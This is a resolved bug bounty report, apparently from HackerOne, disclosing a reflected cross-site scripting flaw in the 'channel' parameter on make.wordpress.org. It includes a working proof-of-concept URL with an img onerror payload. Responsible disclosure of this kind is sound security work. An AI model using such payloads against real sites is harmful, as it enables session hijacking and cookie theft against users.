Reflected XSS on https://make.wordpress.org via 'channel' parameter
High
W
WordPress
Submitted None
Actions:
Reported by
gnux
Vulnerability Details
Technical details and impact analysis
Hi there,
I just found a reflected XSS on make.wordpress.org domain.
steps to reproduce :
1. visit this link :
https://make.wordpress.org/chat/logs?channel=16%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&date=2019-07-21&no_bots=1
2. xss pop up will occurs
POC:
see:wp reflected xss.png
Note: it works on the latest version of firefox
## Impact
some of xss impact like stealing cookies, session hijacking, etc ..
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected